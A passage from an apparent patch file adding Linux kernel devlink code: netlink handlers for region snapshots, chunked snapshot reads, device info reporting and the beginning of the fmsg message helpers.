++		err = -EMSGSIZE;
++		goto out_free_msg;
++	}
++
++	err = devlink_nl_put_handle(msg, devlink);
++	if (err)
++		goto out_cancel_msg;
++
++	if (region->port) {
++		err = nla_put_u32(msg, DEVLINK_ATTR_PORT_INDEX,
++				  region->port->index);
++		if (err)
++			goto out_cancel_msg;
++	}
++
++	err = nla_put_string(msg, DEVLINK_ATTR_REGION_NAME,
++			     region->ops->name);
++	if (err)
++		goto out_cancel_msg;
++
++	if (snapshot) {
++		err = nla_put_u32(msg, DEVLINK_ATTR_REGION_SNAPSHOT_ID,
++				  snapshot->id);
++		if (err)
++			goto out_cancel_msg;
++	} else {
++		err = nla_put_u64_64bit(msg, DEVLINK_ATTR_REGION_SIZE,
++					region->size, DEVLINK_ATTR_PAD);
++		if (err)
++			goto out_cancel_msg;
++	}
++	genlmsg_end(msg, hdr);
++
++	return msg;
++
++out_cancel_msg:
++	genlmsg_cancel(msg, hdr);
++out_free_msg:
++	nlmsg_free(msg);
++	return ERR_PTR(err);
++}
++
++static void devlink_nl_region_notify(struct devlink_region *region,
++				     struct devlink_snapshot *snapshot,
++				     enum devlink_command cmd)
++{
++	struct devlink *devlink = region->devlink;
++	struct sk_buff *msg;
++
++	WARN_ON(cmd != DEVLINK_CMD_REGION_NEW && cmd != DEVLINK_CMD_REGION_DEL);
++	if (!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED))
++		return;
++
++	msg = devlink_nl_region_notify_build(region, snapshot, cmd, 0, 0);
++	if (IS_ERR(msg))
++		return;
++
++	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink), msg,
++				0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
++}
++
++/**
++ * __devlink_snapshot_id_increment - Increment number of snapshots using an id
++ *	@devlink: devlink instance
++ *	@id: the snapshot id
++ *
++ *	Track when a new snapshot begins using an id. Load the count for the
++ *	given id from the snapshot xarray, increment it, and store it back.
++ *
++ *	Called when a new snapshot is created with the given id.
++ *
++ *	The id *must* have been previously allocated by
++ *	devlink_region_snapshot_id_get().
++ *
++ *	Returns 0 on success, or an error on failure.
++ */
++static int __devlink_snapshot_id_increment(struct devlink *devlink, u32 id)
++{
++	unsigned long count;
++	void *p;
++	int err;
++
++	xa_lock(&devlink->snapshot_ids);
++	p = xa_load(&devlink->snapshot_ids, id);
++	if (WARN_ON(!p)) {
++		err = -EINVAL;
++		goto unlock;
++	}
++
++	if (WARN_ON(!xa_is_value(p))) {
++		err = -EINVAL;
++		goto unlock;
++	}
++
++	count = xa_to_value(p);
++	count++;
++
++	err = xa_err(__xa_store(&devlink->snapshot_ids, id, xa_mk_value(count),
++				GFP_ATOMIC));
++unlock:
++	xa_unlock(&devlink->snapshot_ids);
++	return err;
++}
++
++/**
++ * __devlink_snapshot_id_decrement - Decrease number of snapshots using an id
++ *	@devlink: devlink instance
++ *	@id: the snapshot id
++ *
++ *	Track when a snapshot is deleted and stops using an id. Load the count
++ *	for the given id from the snapshot xarray, decrement it, and store it
++ *	back.
++ *
++ *	If the count reaches zero, erase this id from the xarray, freeing it
++ *	up for future re-use by devlink_region_snapshot_id_get().
++ *
++ *	Called when a snapshot using the given id is deleted, and when the
++ *	initial allocator of the id is finished using it.
++ */
++static void __devlink_snapshot_id_decrement(struct devlink *devlink, u32 id)
++{
++	unsigned long count;
++	void *p;
++
++	xa_lock(&devlink->snapshot_ids);
++	p = xa_load(&devlink->snapshot_ids, id);
++	if (WARN_ON(!p))
++		goto unlock;
++
++	if (WARN_ON(!xa_is_value(p)))
++		goto unlock;
++
++	count = xa_to_value(p);
++
++	if (count > 1) {
++		count--;
++		__xa_store(&devlink->snapshot_ids, id, xa_mk_value(count),
++			   GFP_ATOMIC);
++	} else {
++		/* If this was the last user, we can erase this id */
++		__xa_erase(&devlink->snapshot_ids, id);
++	}
++unlock:
++	xa_unlock(&devlink->snapshot_ids);
++}
++
++/**
++ *	__devlink_snapshot_id_insert - Insert a specific snapshot ID
++ *	@devlink: devlink instance
++ *	@id: the snapshot id
++ *
++ *	Mark the given snapshot id as used by inserting a zero value into the
++ *	snapshot xarray.
++ *
++ *	This must be called while holding the devlink instance lock. Unlike
++ *	devlink_snapshot_id_get, the initial reference count is zero, not one.
++ *	It is expected that the id will immediately be used before
++ *	releasing the devlink instance lock.
++ *
++ *	Returns zero on success, or an error code if the snapshot id could not
++ *	be inserted.
++ */
++static int __devlink_snapshot_id_insert(struct devlink *devlink, u32 id)
++{
++	int err;
++
++	xa_lock(&devlink->snapshot_ids);
++	if (xa_load(&devlink->snapshot_ids, id)) {
++		xa_unlock(&devlink->snapshot_ids);
++		return -EEXIST;
++	}
++	err = xa_err(__xa_store(&devlink->snapshot_ids, id, xa_mk_value(0),
++				GFP_ATOMIC));
++	xa_unlock(&devlink->snapshot_ids);
++	return err;
++}
++
++/**
++ *	__devlink_region_snapshot_id_get - get snapshot ID
++ *	@devlink: devlink instance
++ *	@id: storage to return snapshot id
++ *
++ *	Allocates a new snapshot id. Returns zero on success, or a negative
++ *	error on failure. Must be called while holding the devlink instance
++ *	lock.
++ *
++ *	Snapshot IDs are tracked using an xarray which stores the number of
++ *	users of the snapshot id.
++ *
++ *	Note that the caller of this function counts as a 'user', in order to
++ *	avoid race conditions. The caller must release its hold on the
++ *	snapshot by using devlink_region_snapshot_id_put.
++ */
++static int __devlink_region_snapshot_id_get(struct devlink *devlink, u32 *id)
++{
++	return xa_alloc(&devlink->snapshot_ids, id, xa_mk_value(1),
++			xa_limit_32b, GFP_KERNEL);
++}
++
++/**
++ *	__devlink_region_snapshot_create - create a new snapshot
++ *	This will add a new snapshot of a region. The snapshot
++ *	will be stored on the region struct and can be accessed
++ *	from devlink. This is useful for future analyses of snapshots.
++ *	Multiple snapshots can be created on a region.
++ *	The @snapshot_id should be obtained using the getter function.
++ *
++ *	Must be called only while holding the region snapshot lock.
++ *
++ *	@region: devlink region of the snapshot
++ *	@data: snapshot data
++ *	@snapshot_id: snapshot id to be created
++ */
++static int
++__devlink_region_snapshot_create(struct devlink_region *region,
++				 u8 *data, u32 snapshot_id)
++{
++	struct devlink *devlink = region->devlink;
++	struct devlink_snapshot *snapshot;
++	int err;
++
++	lockdep_assert_held(&region->snapshot_lock);
++
++	/* check if region can hold one more snapshot */
++	if (region->cur_snapshots == region->max_snapshots)
++		return -ENOSPC;
++
++	if (devlink_region_snapshot_get_by_id(region, snapshot_id))
++		return -EEXIST;
++
++	snapshot = kzalloc(sizeof(*snapshot), GFP_KERNEL);
++	if (!snapshot)
++		return -ENOMEM;
++
++	err = __devlink_snapshot_id_increment(devlink, snapshot_id);
++	if (err)
++		goto err_snapshot_id_increment;
++
++	snapshot->id = snapshot_id;
++	snapshot->region = region;
++	snapshot->data = data;
++
++	list_add_tail(&snapshot->list, &region->snapshot_list);
++
++	region->cur_snapshots++;
++
++	devlink_nl_region_notify(region, snapshot, DEVLINK_CMD_REGION_NEW);
++	return 0;
++
++err_snapshot_id_increment:
++	kfree(snapshot);
++	return err;
++}
++
++static void devlink_region_snapshot_del(struct devlink_region *region,
++					struct devlink_snapshot *snapshot)
++{
++	struct devlink *devlink = region->devlink;
++
++	lockdep_assert_held(&region->snapshot_lock);
++
++	devlink_nl_region_notify(region, snapshot, DEVLINK_CMD_REGION_DEL);
++	region->cur_snapshots--;
++	list_del(&snapshot->list);
++	region->ops->destructor(snapshot->data);
++	__devlink_snapshot_id_decrement(devlink, snapshot->id);
++	kfree(snapshot);
++}
++
++static int devlink_nl_cmd_region_get_doit(struct sk_buff *skb,
++					  struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_port *port = NULL;
++	struct devlink_region *region;
++	const char *region_name;
++	struct sk_buff *msg;
++	unsigned int index;
++	int err;
++
++	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_REGION_NAME))
++		return -EINVAL;
++
++	if (info->attrs[DEVLINK_ATTR_PORT_INDEX]) {
++		index = nla_get_u32(info->attrs[DEVLINK_ATTR_PORT_INDEX]);
++
++		port = devlink_port_get_by_index(devlink, index);
++		if (!port)
++			return -ENODEV;
++	}
++
++	region_name = nla_data(info->attrs[DEVLINK_ATTR_REGION_NAME]);
++	if (port)
++		region = devlink_port_region_get_by_name(port, region_name);
++	else
++		region = devlink_region_get_by_name(devlink, region_name);
++
++	if (!region)
++		return -EINVAL;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	err = devlink_nl_region_fill(msg, devlink, DEVLINK_CMD_REGION_GET,
++				     info->snd_portid, info->snd_seq, 0,
++				     region);
++	if (err) {
++		nlmsg_free(msg);
++		return err;
++	}
++
++	return genlmsg_reply(msg, info);
++}
++
++static int devlink_nl_cmd_region_get_port_dumpit(struct sk_buff *msg,
++						 struct netlink_callback *cb,
++						 struct devlink_port *port,
++						 int *idx,
++						 int start)
++{
++	struct devlink_region *region;
++	int err = 0;
++
++	list_for_each_entry(region, &port->region_list, list) {
++		if (*idx < start) {
++			(*idx)++;
++			continue;
++		}
++		err = devlink_nl_region_fill(msg, port->devlink,
++					     DEVLINK_CMD_REGION_GET,
++					     NETLINK_CB(cb->skb).portid,
++					     cb->nlh->nlmsg_seq,
++					     NLM_F_MULTI, region);
++		if (err)
++			goto out;
++		(*idx)++;
++	}
++
++out:
++	return err;
++}
++
++static int devlink_nl_cmd_region_get_devlink_dumpit(struct sk_buff *msg,
++						    struct netlink_callback *cb,
++						    struct devlink *devlink,
++						    int *idx,
++						    int start)
++{
++	struct devlink_region *region;
++	struct devlink_port *port;
++	int err = 0;
++
++	devl_lock(devlink);
++	list_for_each_entry(region, &devlink->region_list, list) {
++		if (*idx < start) {
++			(*idx)++;
++			continue;
++		}
++		err = devlink_nl_region_fill(msg, devlink,
++					     DEVLINK_CMD_REGION_GET,
++					     NETLINK_CB(cb->skb).portid,
++					     cb->nlh->nlmsg_seq,
++					     NLM_F_MULTI, region);
++		if (err)
++			goto out;
++		(*idx)++;
++	}
++
++	list_for_each_entry(port, &devlink->port_list, list) {
++		err = devlink_nl_cmd_region_get_port_dumpit(msg, cb, port, idx,
++							    start);
++		if (err)
++			goto out;
++	}
++
++out:
++	devl_unlock(devlink);
++	return err;
++}
++
++static int devlink_nl_cmd_region_get_dumpit(struct sk_buff *msg,
++					    struct netlink_callback *cb)
++{
++	struct devlink *devlink;
++	int start = cb->args[0];
++	unsigned long index;
++	int idx = 0;
++	int err = 0;
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		err = devlink_nl_cmd_region_get_devlink_dumpit(msg, cb, devlink,
++							       &idx, start);
++		devlink_put(devlink);
++		if (err)
++			goto out;
++	}
++out:
++	cb->args[0] = idx;
++	return msg->len;
++}
++
++static int devlink_nl_cmd_region_del(struct sk_buff *skb,
++				     struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_snapshot *snapshot;
++	struct devlink_port *port = NULL;
++	struct devlink_region *region;
++	const char *region_name;
++	unsigned int index;
++	u32 snapshot_id;
++
++	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_REGION_NAME) ||
++	    GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_REGION_SNAPSHOT_ID))
++		return -EINVAL;
++
++	region_name = nla_data(info->attrs[DEVLINK_ATTR_REGION_NAME]);
++	snapshot_id = nla_get_u32(info->attrs[DEVLINK_ATTR_REGION_SNAPSHOT_ID]);
++
++	if (info->attrs[DEVLINK_ATTR_PORT_INDEX]) {
++		index = nla_get_u32(info->attrs[DEVLINK_ATTR_PORT_INDEX]);
++
++		port = devlink_port_get_by_index(devlink, index);
++		if (!port)
++			return -ENODEV;
++	}
++
++	if (port)
++		region = devlink_port_region_get_by_name(port, region_name);
++	else
++		region = devlink_region_get_by_name(devlink, region_name);
++
++	if (!region)
++		return -EINVAL;
++
++	mutex_lock(&region->snapshot_lock);
++	snapshot = devlink_region_snapshot_get_by_id(region, snapshot_id);
++	if (!snapshot) {
++		mutex_unlock(&region->snapshot_lock);
++		return -EINVAL;
++	}
++
++	devlink_region_snapshot_del(region, snapshot);
++	mutex_unlock(&region->snapshot_lock);
++	return 0;
++}
++
++static int
++devlink_nl_cmd_region_new(struct sk_buff *skb, struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_snapshot *snapshot;
++	struct devlink_port *port = NULL;
++	struct nlattr *snapshot_id_attr;
++	struct devlink_region *region;
++	const char *region_name;
++	unsigned int index;
++	u32 snapshot_id;
++	u8 *data;
++	int err;
++
++	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_REGION_NAME)) {
++		NL_SET_ERR_MSG_MOD(info->extack, "No region name provided");
++		return -EINVAL;
++	}
++
++	region_name = nla_data(info->attrs[DEVLINK_ATTR_REGION_NAME]);
++
++	if (info->attrs[DEVLINK_ATTR_PORT_INDEX]) {
++		index = nla_get_u32(info->attrs[DEVLINK_ATTR_PORT_INDEX]);
++
++		port = devlink_port_get_by_index(devlink, index);
++		if (!port)
++			return -ENODEV;
++	}
++
++	if (port)
++		region = devlink_port_region_get_by_name(port, region_name);
++	else
++		region = devlink_region_get_by_name(devlink, region_name);
++
++	if (!region) {
++		NL_SET_ERR_MSG_MOD(info->extack, "The requested region does not exist");
++		return -EINVAL;
++	}
++
++	if (!region->ops->snapshot) {
++		NL_SET_ERR_MSG_MOD(info->extack, "The requested region does not support taking an immediate snapshot");
++		return -EOPNOTSUPP;
++	}
++
++	mutex_lock(&region->snapshot_lock);
++
++	if (region->cur_snapshots == region->max_snapshots) {
++		NL_SET_ERR_MSG_MOD(info->extack, "The region has reached the maximum number of stored snapshots");
++		err = -ENOSPC;
++		goto unlock;
++	}
++
++	snapshot_id_attr = info->attrs[DEVLINK_ATTR_REGION_SNAPSHOT_ID];
++	if (snapshot_id_attr) {
++		snapshot_id = nla_get_u32(snapshot_id_attr);
++
++		if (devlink_region_snapshot_get_by_id(region, snapshot_id)) {
++			NL_SET_ERR_MSG_MOD(info->extack, "The requested snapshot id is already in use");
++			err = -EEXIST;
++			goto unlock;
++		}
++
++		err = __devlink_snapshot_id_insert(devlink, snapshot_id);
++		if (err)
++			goto unlock;
++	} else {
++		err = __devlink_region_snapshot_id_get(devlink, &snapshot_id);
++		if (err) {
++			NL_SET_ERR_MSG_MOD(info->extack, "Failed to allocate a new snapshot id");
++			goto unlock;
++		}
++	}
++
++	if (port)
++		err = region->port_ops->snapshot(port, region->port_ops,
++						 info->extack, &data);
++	else
++		err = region->ops->snapshot(devlink, region->ops,
++					    info->extack, &data);
++	if (err)
++		goto err_snapshot_capture;
++
++	err = __devlink_region_snapshot_create(region, data, snapshot_id);
++	if (err)
++		goto err_snapshot_create;
++
++	if (!snapshot_id_attr) {
++		struct sk_buff *msg;
++
++		snapshot = devlink_region_snapshot_get_by_id(region,
++							     snapshot_id);
++		if (WARN_ON(!snapshot)) {
++			err = -EINVAL;
++			goto unlock;
++		}
++
++		msg = devlink_nl_region_notify_build(region, snapshot,
++						     DEVLINK_CMD_REGION_NEW,
++						     info->snd_portid,
++						     info->snd_seq);
++		err = PTR_ERR_OR_ZERO(msg);
++		if (err)
++			goto err_notify;
++
++		err = genlmsg_reply(msg, info);
++		if (err)
++			goto err_notify;
++	}
++
++	mutex_unlock(&region->snapshot_lock);
++	return 0;
++
++err_snapshot_create:
++	region->ops->destructor(data);
++err_snapshot_capture:
++	__devlink_snapshot_id_decrement(devlink, snapshot_id);
++	mutex_unlock(&region->snapshot_lock);
++	return err;
++
++err_notify:
++	devlink_region_snapshot_del(region, snapshot);
++unlock:
++	mutex_unlock(&region->snapshot_lock);
++	return err;
++}
++
++static int devlink_nl_cmd_region_read_chunk_fill(struct sk_buff *msg,
++						 struct devlink *devlink,
++						 u8 *chunk, u32 chunk_size,
++						 u64 addr)
++{
++	struct nlattr *chunk_attr;
++	int err;
++
++	chunk_attr = nla_nest_start_noflag(msg, DEVLINK_ATTR_REGION_CHUNK);
++	if (!chunk_attr)
++		return -EINVAL;
++
++	err = nla_put(msg, DEVLINK_ATTR_REGION_CHUNK_DATA, chunk_size, chunk);
++	if (err)
++		goto nla_put_failure;
++
++	err = nla_put_u64_64bit(msg, DEVLINK_ATTR_REGION_CHUNK_ADDR, addr,
++				DEVLINK_ATTR_PAD);
++	if (err)
++		goto nla_put_failure;
++
++	nla_nest_end(msg, chunk_attr);
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(msg, chunk_attr);
++	return err;
++}
++
++#define DEVLINK_REGION_READ_CHUNK_SIZE 256
++
++static int devlink_nl_region_read_snapshot_fill(struct sk_buff *skb,
++						struct devlink *devlink,
++						struct devlink_region *region,
++						struct nlattr **attrs,
++						u64 start_offset,
++						u64 end_offset,
++						u64 *new_offset)
++{
++	struct devlink_snapshot *snapshot;
++	u64 curr_offset = start_offset;
++	u32 snapshot_id;
++	int err = 0;
++
++	*new_offset = start_offset;
++
++	snapshot_id = nla_get_u32(attrs[DEVLINK_ATTR_REGION_SNAPSHOT_ID]);
++	snapshot = devlink_region_snapshot_get_by_id(region, snapshot_id);
++	if (!snapshot)
++		return -EINVAL;
++
++	while (curr_offset < end_offset) {
++		u32 data_size;
++		u8 *data;
++
++		if (end_offset - curr_offset < DEVLINK_REGION_READ_CHUNK_SIZE)
++			data_size = end_offset - curr_offset;
++		else
++			data_size = DEVLINK_REGION_READ_CHUNK_SIZE;
++
++		data = &snapshot->data[curr_offset];
++		err = devlink_nl_cmd_region_read_chunk_fill(skb, devlink,
++							    data, data_size,
++							    curr_offset);
++		if (err)
++			break;
++
++		curr_offset += data_size;
++	}
++	*new_offset = curr_offset;
++
++	return err;
++}
++
++static int devlink_nl_cmd_region_read_dumpit(struct sk_buff *skb,
++					     struct netlink_callback *cb)
++{
++	const struct genl_dumpit_info *info = genl_dumpit_info(cb);
++	u64 ret_offset, start_offset, end_offset = U64_MAX;
++	struct nlattr **attrs = info->attrs;
++	struct devlink_port *port = NULL;
++	struct devlink_region *region;
++	struct nlattr *chunks_attr;
++	const char *region_name;
++	struct devlink *devlink;
++	unsigned int index;
++	void *hdr;
++	int err;
++
++	start_offset = *((u64 *)&cb->args[0]);
++
++	devlink = devlink_get_from_attrs(sock_net(cb->skb->sk), attrs);
++	if (IS_ERR(devlink))
++		return PTR_ERR(devlink);
++
++	devl_lock(devlink);
++
++	if (!attrs[DEVLINK_ATTR_REGION_NAME] ||
++	    !attrs[DEVLINK_ATTR_REGION_SNAPSHOT_ID]) {
++		err = -EINVAL;
++		goto out_unlock;
++	}
++
++	if (info->attrs[DEVLINK_ATTR_PORT_INDEX]) {
++		index = nla_get_u32(info->attrs[DEVLINK_ATTR_PORT_INDEX]);
++
++		port = devlink_port_get_by_index(devlink, index);
++		if (!port) {
++			err = -ENODEV;
++			goto out_unlock;
++		}
++	}
++
++	region_name = nla_data(attrs[DEVLINK_ATTR_REGION_NAME]);
++
++	if (port)
++		region = devlink_port_region_get_by_name(port, region_name);
++	else
++		region = devlink_region_get_by_name(devlink, region_name);
++
++	if (!region) {
++		err = -EINVAL;
++		goto out_unlock;
++	}
++
++	if (attrs[DEVLINK_ATTR_REGION_CHUNK_ADDR] &&
++	    attrs[DEVLINK_ATTR_REGION_CHUNK_LEN]) {
++		if (!start_offset)
++			start_offset =
++				nla_get_u64(attrs[DEVLINK_ATTR_REGION_CHUNK_ADDR]);
++
++		end_offset = nla_get_u64(attrs[DEVLINK_ATTR_REGION_CHUNK_ADDR]);
++		end_offset += nla_get_u64(attrs[DEVLINK_ATTR_REGION_CHUNK_LEN]);
++	}
++
++	if (end_offset > region->size)
++		end_offset = region->size;
++
++	/* return 0 if there is no further data to read */
++	if (start_offset == end_offset) {
++		err = 0;
++		goto out_unlock;
++	}
++
++	hdr = genlmsg_put(skb, NETLINK_CB(cb->skb).portid, cb->nlh->nlmsg_seq,
++			  &devlink_nl_family, NLM_F_ACK | NLM_F_MULTI,
++			  DEVLINK_CMD_REGION_READ);
++	if (!hdr) {
++		err = -EMSGSIZE;
++		goto out_unlock;
++	}
++
++	err = devlink_nl_put_handle(skb, devlink);
++	if (err)
++		goto nla_put_failure;
++
++	if (region->port) {
++		err = nla_put_u32(skb, DEVLINK_ATTR_PORT_INDEX,
++				  region->port->index);
++		if (err)
++			goto nla_put_failure;
++	}
++
++	err = nla_put_string(skb, DEVLINK_ATTR_REGION_NAME, region_name);
++	if (err)
++		goto nla_put_failure;
++
++	chunks_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_REGION_CHUNKS);
++	if (!chunks_attr) {
++		err = -EMSGSIZE;
++		goto nla_put_failure;
++	}
++
++	err = devlink_nl_region_read_snapshot_fill(skb, devlink,
++						   region, attrs,
++						   start_offset,
++						   end_offset, &ret_offset);
++
++	if (err && err != -EMSGSIZE)
++		goto nla_put_failure;
++
++	/* Check if there was any progress done to prevent infinite loop */
++	if (ret_offset == start_offset) {
++		err = -EINVAL;
++		goto nla_put_failure;
++	}
++
++	*((u64 *)&cb->args[0]) = ret_offset;
++
++	nla_nest_end(skb, chunks_attr);
++	genlmsg_end(skb, hdr);
++	devl_unlock(devlink);
++	devlink_put(devlink);
++	return skb->len;
++
++nla_put_failure:
++	genlmsg_cancel(skb, hdr);
++out_unlock:
++	devl_unlock(devlink);
++	devlink_put(devlink);
++	return err;
++}
++
++int devlink_info_driver_name_put(struct devlink_info_req *req, const char *name)
++{
++	if (!req->msg)
++		return 0;
++	return nla_put_string(req->msg, DEVLINK_ATTR_INFO_DRIVER_NAME, name);
++}
++EXPORT_SYMBOL_GPL(devlink_info_driver_name_put);
++
++int devlink_info_serial_number_put(struct devlink_info_req *req, const char *sn)
++{
++	if (!req->msg)
++		return 0;
++	return nla_put_string(req->msg, DEVLINK_ATTR_INFO_SERIAL_NUMBER, sn);
++}
++EXPORT_SYMBOL_GPL(devlink_info_serial_number_put);
++
++int devlink_info_board_serial_number_put(struct devlink_info_req *req,
++					 const char *bsn)
++{
++	if (!req->msg)
++		return 0;
++	return nla_put_string(req->msg, DEVLINK_ATTR_INFO_BOARD_SERIAL_NUMBER,
++			      bsn);
++}
++EXPORT_SYMBOL_GPL(devlink_info_board_serial_number_put);
++
++static int devlink_info_version_put(struct devlink_info_req *req, int attr,
++				    const char *version_name,
++				    const char *version_value,
++				    enum devlink_info_version_type version_type)
++{
++	struct nlattr *nest;
++	int err;
++
++	if (req->version_cb)
++		req->version_cb(version_name, version_type,
++				req->version_cb_priv);
++
++	if (!req->msg)
++		return 0;
++
++	nest = nla_nest_start_noflag(req->msg, attr);
++	if (!nest)
++		return -EMSGSIZE;
++
++	err = nla_put_string(req->msg, DEVLINK_ATTR_INFO_VERSION_NAME,
++			     version_name);
++	if (err)
++		goto nla_put_failure;
++
++	err = nla_put_string(req->msg, DEVLINK_ATTR_INFO_VERSION_VALUE,
++			     version_value);
++	if (err)
++		goto nla_put_failure;
++
++	nla_nest_end(req->msg, nest);
++
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(req->msg, nest);
++	return err;
++}
++
++int devlink_info_version_fixed_put(struct devlink_info_req *req,
++				   const char *version_name,
++				   const char *version_value)
++{
++	return devlink_info_version_put(req, DEVLINK_ATTR_INFO_VERSION_FIXED,
++					version_name, version_value,
++					DEVLINK_INFO_VERSION_TYPE_NONE);
++}
++EXPORT_SYMBOL_GPL(devlink_info_version_fixed_put);
++
++int devlink_info_version_stored_put(struct devlink_info_req *req,
++				    const char *version_name,
++				    const char *version_value)
++{
++	return devlink_info_version_put(req, DEVLINK_ATTR_INFO_VERSION_STORED,
++					version_name, version_value,
++					DEVLINK_INFO_VERSION_TYPE_NONE);
++}
++EXPORT_SYMBOL_GPL(devlink_info_version_stored_put);
++
++int devlink_info_version_stored_put_ext(struct devlink_info_req *req,
++					const char *version_name,
++					const char *version_value,
++					enum devlink_info_version_type version_type)
++{
++	return devlink_info_version_put(req, DEVLINK_ATTR_INFO_VERSION_STORED,
++					version_name, version_value,
++					version_type);
++}
++EXPORT_SYMBOL_GPL(devlink_info_version_stored_put_ext);
++
++int devlink_info_version_running_put(struct devlink_info_req *req,
++				     const char *version_name,
++				     const char *version_value)
++{
++	return devlink_info_version_put(req, DEVLINK_ATTR_INFO_VERSION_RUNNING,
++					version_name, version_value,
++					DEVLINK_INFO_VERSION_TYPE_NONE);
++}
++EXPORT_SYMBOL_GPL(devlink_info_version_running_put);
++
++int devlink_info_version_running_put_ext(struct devlink_info_req *req,
++					 const char *version_name,
++					 const char *version_value,
++					 enum devlink_info_version_type version_type)
++{
++	return devlink_info_version_put(req, DEVLINK_ATTR_INFO_VERSION_RUNNING,
++					version_name, version_value,
++					version_type);
++}
++EXPORT_SYMBOL_GPL(devlink_info_version_running_put_ext);
++
++static int
++devlink_nl_info_fill(struct sk_buff *msg, struct devlink *devlink,
++		     enum devlink_command cmd, u32 portid,
++		     u32 seq, int flags, struct netlink_ext_ack *extack)
++{
++	struct devlink_info_req req = {};
++	void *hdr;
++	int err;
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	err = -EMSGSIZE;
++	if (devlink_nl_put_handle(msg, devlink))
++		goto err_cancel_msg;
++
++	req.msg = msg;
++	err = devlink->ops->info_get(devlink, &req, extack);
++	if (err)
++		goto err_cancel_msg;
++
++	genlmsg_end(msg, hdr);
++	return 0;
++
++err_cancel_msg:
++	genlmsg_cancel(msg, hdr);
++	return err;
++}
++
++static int devlink_nl_cmd_info_get_doit(struct sk_buff *skb,
++					struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct sk_buff *msg;
++	int err;
++
++	if (!devlink->ops->info_get)
++		return -EOPNOTSUPP;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	err = devlink_nl_info_fill(msg, devlink, DEVLINK_CMD_INFO_GET,
++				   info->snd_portid, info->snd_seq, 0,
++				   info->extack);
++	if (err) {
++		nlmsg_free(msg);
++		return err;
++	}
++
++	return genlmsg_reply(msg, info);
++}
++
++static int devlink_nl_cmd_info_get_dumpit(struct sk_buff *msg,
++					  struct netlink_callback *cb)
++{
++	struct devlink *devlink;
++	int start = cb->args[0];
++	unsigned long index;
++	int idx = 0;
++	int err = 0;
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		if (idx < start || !devlink->ops->info_get)
++			goto inc;
++
++		devl_lock(devlink);
++		err = devlink_nl_info_fill(msg, devlink, DEVLINK_CMD_INFO_GET,
++					   NETLINK_CB(cb->skb).portid,
++					   cb->nlh->nlmsg_seq, NLM_F_MULTI,
++					   cb->extack);
++		devl_unlock(devlink);
++		if (err == -EOPNOTSUPP)
++			err = 0;
++		else if (err) {
++			devlink_put(devlink);
++			break;
++		}
++inc:
++		idx++;
++		devlink_put(devlink);
++	}
++
++	if (err != -EMSGSIZE)
++		return err;
++
++	cb->args[0] = idx;
++	return msg->len;
++}
++
++struct devlink_fmsg_item {
++	struct list_head list;
++	int attrtype;
++	u8 nla_type;
++	u16 len;
++	int value[];
++};
++
++struct devlink_fmsg {
++	struct list_head item_list;
++	bool putting_binary; /* This flag forces enclosing of binary data
++			      * in an array brackets. It forces using
++			      * of designated API:
++			      * devlink_fmsg_binary_pair_nest_start()
++			      * devlink_fmsg_binary_pair_nest_end()
++			      */
++};
++
++static struct devlink_fmsg *devlink_fmsg_alloc(void)
++{
++	struct devlink_fmsg *fmsg;
++
++	fmsg = kzalloc(sizeof(*fmsg), GFP_KERNEL);
++	if (!fmsg)
++		return NULL;
++
++	INIT_LIST_HEAD(&fmsg->item_list);
++
++	return fmsg;
++}
++
++static void devlink_fmsg_free(struct devlink_fmsg *fmsg)
++{
++	struct devlink_fmsg_item *item, *tmp;
++
++	list_for_each_entry_safe(item, tmp, &fmsg->item_list, list) {
++		list_del(&item->list);
++		kfree(item);
++	}
++	kfree(fmsg);
++}
++
++static int devlink_fmsg_nest_common(struct devlink_fmsg *fmsg,
++				    int attrtype)
++{
++	struct devlink_fmsg_item *item;
++
++	item = kzalloc(sizeof(*item), GFP_KERNEL);
++	if (!item)
++		return -ENOMEM;
++
++	item->attrtype = attrtype;
++	list_add_tail(&item->list, &fmsg->item_list);
++
++	return 0;
++}
++
++int devlink_fmsg_obj_nest_start(struct devlink_fmsg *fmsg)
++{
++	if (fmsg->putting_binary)
++		return -EINVAL;
++
++	return devlink_fmsg_nest_common(fmsg, DEVLINK_ATTR_FMSG_OBJ_NEST_START);
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_obj_nest_start);
++
++static int devlink_fmsg_nest_end(struct devlink_fmsg *fmsg)
++{
++	if (fmsg->putting_binary)
++		return -EINVAL;
++
++	return devlink_fmsg_nest_common(fmsg, DEVLINK_ATTR_FMSG_NEST_END);
++}
++
++int devlink_fmsg_obj_nest_end(struct devlink_fmsg *fmsg)
++{
++	if (fmsg->putting_binary)
++		return -EINVAL;
++
++	return devlink_fmsg_nest_end(fmsg);
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_obj_nest_end);
++
++#define DEVLINK_FMSG_MAX_SIZE (GENLMSG_DEFAULT_SIZE - GENL_HDRLEN - NLA_HDRLEN)
++
++static int devlink_fmsg_put_name(struct devlink_fmsg *fmsg, const char *name)
++{
++	struct devlink_fmsg_item *item;
++
++	if (fmsg->putting_binary)
++		return -EINVAL;
++
++	if (strlen(name) + 1 > DEVLINK_FMSG_MAX_SIZE)
++		return -EMSGSIZE;
++
++	item = kzalloc(sizeof(*item) + strlen(name) + 1, GFP_KERNEL);
